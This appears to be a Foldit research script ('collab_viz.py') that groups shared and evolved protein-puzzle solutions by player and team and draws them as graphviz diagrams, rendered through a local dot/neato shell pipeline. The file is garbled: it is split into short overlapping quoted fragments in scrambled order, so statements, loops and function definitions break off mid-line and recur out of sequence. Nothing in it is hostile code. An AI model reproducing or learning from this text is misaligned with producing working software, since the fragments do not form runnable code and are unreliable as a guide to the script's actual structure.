"+ \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in any evolver", "argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in", "tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out:", "typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands =", "for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) #", "== pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p", "{c.name: c.energy * c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag,", "\"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot", 
"x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for", "1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d:", "if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({}", "d: [x for x in d if int(x.sharing_gid) > 1]), []), key=lambda p:", "any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source:", "= len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) #", "groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in", "# with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style':", "10 else 'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid] =", "uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid)", "# color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use", "for p in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for", "int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][", "xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm", "- start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e", "front = [(1, c) for c in collab.children] # while len(front) > 0:", "in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs:", "in evolved: shape = \"box\" if p.scoretype == '1' or 
is_corrupted(p.pdl, p.uid) else", "node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid,", "str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str,", "collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front =", "*target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >=", "plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids", "= get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str:", "len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid]", "def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff),", "for uid, pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs: if", "if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves =", "out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} | neato", "edges for shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for", "{gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create", "p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid =", "p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if", "'2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict =", "pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p 
for", "= sum(([p for p in pdbs if p.scoretype == '1' and get_tag(p) in", "if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children", "cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps", "[(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) ==", "sids] if sids else [], {c.name: c.energy * c.weight for c in root.energy_components},", "node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved:", "for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid #", "\"1\": return s.uid for i, line in enumerate(lines): sids = [p.sid for p", "tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag:", "= color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid]", "groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c", "layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC", "= front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c", "= groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped", "min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'],", "in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c", "= { # uid: {k: min(g, key=lambda p: p.energy) for k, g in", "args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool: pool.map(render_collab, 
args.pids,", "4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4))", "and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs)", "gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid)", "(\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl,", "int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map(", "uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in", "[]) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) >", "source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp -", "in groups_uids} evolved = {} # create evolver nodes & edges uid_grouped =", "# dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in", "start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid,", "g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid)", "d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]),", "uid not in active_uids} # screen out anyone who later actively evolved #", "x in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p:", "uid, pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype", "x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda", "or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, 
p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy),", "collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df", "anyone who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), #", "for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for", "# gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in", "df = data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos =", "lines: list) -> str: if s.scoretype == \"1\": return s.uid for i, line", "x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] =", "euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for", "pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in", "# further group by source evolved_targets = {target for targets in uid_source_grouped.values() for", "if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid,", "# for gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid", "pdbs[0].gid for p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid):", "for i, line in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if", "list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid,", "e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if", "= True # for sg 
in evolver_clusters.values(): # dot.subgraph(sg) # do it again,", "evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid],", "Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create evolver", "euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype", "+ 0.9 * (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy),", "node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets", "[x for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid),", "in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), []))", "in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda", "s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda", "is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape,", "get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid", "uid, g in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) #", "c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in", "e: get_source_tag(e))} for uid, g in uid_grouped} # further group by source evolved_targets", "# node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for 
gid in gids} for uid,", "if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), [])", "= remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype == '2'", "x in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p:", "line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w')", "fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\",", "x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors", "style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) #", "in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid],", "for p in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if", "0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] ==", "ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'],", "in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start)", "else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df)", "== \"1\": return s.uid for i, line in enumerate(lines): sids = [p.sid for", "uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\"", "round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in", "source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, #", 
"zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true',", "key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for", "# node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for", "= Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else [], {c.name:", "cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] *", "{} or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99", "gid in groups_uids} evolved = {} # create evolver nodes & edges uid_grouped", "key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])),", "group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style':", "p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source", "k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g", "p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), #", "= data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines", "= \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} |", "ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list)", "collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs in", "= {} for pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start", "targets in uid_source_grouped.values() for target in targets} 
roots = sum(([p for p in", "in uid_grouped} # further group by source evolved_targets = {target for targets in", "collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and", "sids else [], {c.name: c.energy * c.weight for c in root.energy_components}, tag, None,", "list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source", "for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared", "\"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid,", "get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid,", "get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e):", "solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs:", "ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def", "# screen out anyone who later actively evolved # # evolver_clusters = {gid:", "line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver", "None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in", "for target in targets} roots = sum(([p for p in pdbs if p.scoretype", "== 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])}", "soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids", "> 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda", "| gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, 
outname), shell=True, check=True)", "== '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict", "+ list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid", "+= 1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] *", "parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else:", "json import logging from itertools import groupby import pandas as pd import numpy", "cdict = {} # gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid']", "in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp),", "gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if", "shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid),", "else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if", "edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved", "import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\")", "cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6',", "(s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children =", "({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'})", "in sorted(collabs['2003642'], key=lambda c: 
c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1,", "'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in", "p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source =", "{tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))}", "pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab,", "if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and", "p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c", "int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {}", "> 0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab", "evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it", "not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels':", "evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid", "+ (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def", "min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 *", "# print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in cur.children])", "parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool:", "evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs", "* (evoling_start - start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp", "for prev_uid, color in 
group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] =", "s.sid in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {}", "collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid):", "1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {}", "/ (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves])", "= {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid:", "[])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x", "return s.uid for i, line in enumerate(lines): sids = [p.sid for p in", "root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab =", "children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1:", "> 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]),", "and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid]", "= [] for root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup,", "matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data", "class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs:", "ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing import", "tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab", "to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) 
with open(outname, 'w') as out: out.write(dot.source)", "while len(front) > 0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag)", "in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors)", "user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids =", "dot.subgraph(sg) # nodes and edges for shared solutions for uid, pdbs in shared.items():", "= {} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e:", "check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str", "group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line graphviz tools to", "= [p.sid for p in line.pdb_infos] if s.sid in sids: return s.uid +", "group by evolver uid_source_grouped = { uid: {k: list(g) for k, g in", "groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped =", "evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs", "+ passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') #", "time for people who just loaded in a shared solution but didn't do", "= data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda", "'2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in", "+ np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else \"solid\")", "cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col): return '#' +", "int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = 
remove_corrupted(sum(pdb_infos.map(", "euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k:", "/ (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False)", "penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items():", "list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for", "uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items():", "p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid,", "for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child =", "gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves", "front.extend([(ntab + 1, c) for c in cur.children]) if __name__ == '__main__': parser", "evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg", "sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in", "anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped", "ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return", "def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def", "in active_evolves + passive_evolves]) 
# cm = plt.get_cmap('tab10' if len(gids) <= 10 else", "import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1]", "[]), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for", "x in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]),", "s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in any", "[x for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped", "in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data,", "x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = []", "'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source,", "evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions for uid, pdbs", "pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) #", "= pdbs[0].gid for p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl,", "for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d", "uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target,", "p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output", "import argparse import os import csv import json import logging from itertools import", "gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid", "p: p.energy) for k, g in # 